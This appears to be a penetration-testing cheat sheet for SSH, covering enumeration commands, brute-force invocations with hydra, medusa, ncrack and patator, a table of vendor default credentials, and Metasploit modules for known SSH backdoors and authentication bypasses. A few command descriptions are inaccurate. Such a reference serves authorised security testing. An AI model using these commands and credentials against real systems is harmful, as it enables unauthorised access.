SSH Pentesting Best Practices

SSH

SSH usually uses port 22

What is SSH?

SSH or Secure Shell is a network communication protocol that enables two computers to communicate (c.f http or hypertext transfer protocol, which is the protocol used to transfer hypertext such as web pages) and share data. An inherent feature of ssh is that the communication between the two computers is encrypted meaning that it is suitable for use on insecure networks.

PORT     STATE SERVICE               VERSION
22/tcp   open  ssh                   OpenSSH4.7p1 Debian 8ubuntu1 (protocol 2.0)

SSH Working Principle

The protocol works in the client-server model, which means that the connection is established by the SSH client connecting to the SSH server. The SSH client drives the connection setup process and uses public key cryptography to verify the identity of the SSH server. After the setup phase the SSH protocol uses strong symmetric encryption and hashing algorithms to ensure the privacy and integrity of the data that is exchanged between the client and server.

The figure below presents a simplified setup flow of a secure shell connection.

client- ssh-server connection

SSH Pentesting

Shodan search query :
port:22
openssh -port:22

Banner Grabbing

telnet 10.10.x.x 22
nc -nv 10.10.x.x 22
scanssh -p -r -e excludes 10.10.x.x/24 (https://www.monkey.org/~provos/scanssh/)

#Metasploit Framework:
msf > use auxiliary/scanner/ssh/ssh_version
msf > use auxiliary/scanner/ssh/detect_kippo #This module will detect if an SSH server is running a Kippo honeypot

#Nmap Scripts:
nmap -sC -p22 10.10.x.x  # Send default nmap scripts for SSH
nmap -sV -p22 10.10.x.x # Retrieve version
nmap -p22 10.10.x.x --script ssh2-enum-algos # Retrieve supported algorythms 
nmap -p22 10.10.x.x --script ssh-hostkey --script-args ssh_hostkey=full # Retrieve weak keys
nmap -p22 10.10.x.x --script ssh-auth-methods --script-args="ssh.user=root" # Check authentication methods

SSH Banner Grabbing with nmap banner script

Supported Authentication Methods (password, private key)

nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=<username>" 10.10.x.x

ssh authentication methods enumeration with nmap script

SSH Connection Tools

Linux & Mac

ssh username@10.10.x.x #If ssh is running on another port, the -p parameter should be used.
#IPv6: 
ssh username@fe80::b0ec:afd2:a932:252c%9

Windows:

• Putty
• Filezilla
• Winscp

SSH Credentials

SSH Brute Forcing

#Metasploit ssh brute force
msf > use auxiliary/scanner/ssh/ssh_login

#Metasploit username enumeration with brute force
use auxiliary/scanner/ssh/ssh_enumusers

#Nmap Brute Force
nmap -p 22 --script ssh-brute --script-args userdb=users.list,passdb=pass.list \--script-args ssh-brute.timeout=4s 10.10.x.x

#Other Brute Forcing Methods
hydra -L users.txt -P passwords.txt ssh://10.10.x.x -t 8
medusa -t 2 -T2 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -H /root/Desktop/host.txt -n 22 -M ssh
ncrack -g CL=2 -U users.list -P passwords.list -iL targetIPs.list -p ssh:22 -oA Results.txt
patator ssh_login host=10.10.x.x user=FILE0 password=FILE1 0=users.list 1=passwords.list persistent=0 -x ignore:mesg=’Authentication failed.’
./guess-who -l username -h 10.10.x.x -p 22 -2 < passwords.list (https://packetstormsecurity.com/groups/teso/guess-who-0.44.tgz)

SSH Default Credentials for Vendors

Vendor	Username	Password
APC	apc, device	apc
Brocade	admin	admin123, password, brocade, fibranne
Cisco	admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin	admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme
Citrix	root, nsroot, nsmaint, vdiadmin, kvm, cli, admin	C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler
D-Link	admin, user	private, admin, user
Dell	root, user1, admin, vkernel, cli	calvin, 123456, password, vkernel, Stor@ge!, admin
EMC	admin, root, sysadmin	EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc
HP/3Com	admin, root, vcx, app, spvar, manage, hpsupport, opc_op	iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !manage, !admin
Huawei	admin, root	123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123
IBM	USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer	PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer
Juniper	netscreen	netscreen
NetApp	admin	netapp123
Oracle	root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user	changeme, ilom-admin, ilom-operator, welcome1, oracle
VMware	vi-admin, root, hqadmin, vmware, admin	vmware, vmw@re, hqadmin, default

Vulnerabilities

Specific Vulnerabilities and Exploits

#Fortinet SSH backdoor [CVE-2016-1909]
msf > auxiliary/scanner/ssh/fortinet_backdoor

#JuniperSSH backdoor [CVE-2015-7755]
msf > auxiliary/scanner/ssh/juniper_backdoor

#F5 BIG-IP < 9.4.8-HF5, 10.2.4, 11.0.0-HF2, 11.1.0-HF3; Enterprise Manager < 2.1.0-HF2, 2.2.0-HF1, 2.3.0-HF3 [CVE-2012-1493]
msf > exploit/linux/ssh/f5_bigip_known_privkey

#Freesshd <= 1.2.6 / Windows (Universal) [CVE-2012-6066]
FreeBSD OpenSSH 3.5.p1
Exploit-DB: 17462.txt
msf > exploit/windows/ssh/freesshd_authbypass

Some Tips

List of some static Host and Authentication keys:

GitHub - rapid7/ssh-badkeys: A collection of static SSH keys (public and private) that have made their way into software and hardware products.
GitHub Repo for static Host and Authentication keys

The keys of the previously connected servers can be listed on the compromised computer.

ssh-keyscan -t rsa,dsa,ecdsa,ed25519 -p 22 10.10.x.x

The keys of the previously connected servers on the compromised computer.

Running a command over SSH with a key

ssh -o PasswordAuthentication=no -o BatchMode=yes -v -p 22 -i key -l username 10.10.x.x 'command'

SFTP Tunneling

sudo ssh -L <local-port>:10.10.x.x:<remote-port> -N -f username@10.10.x.x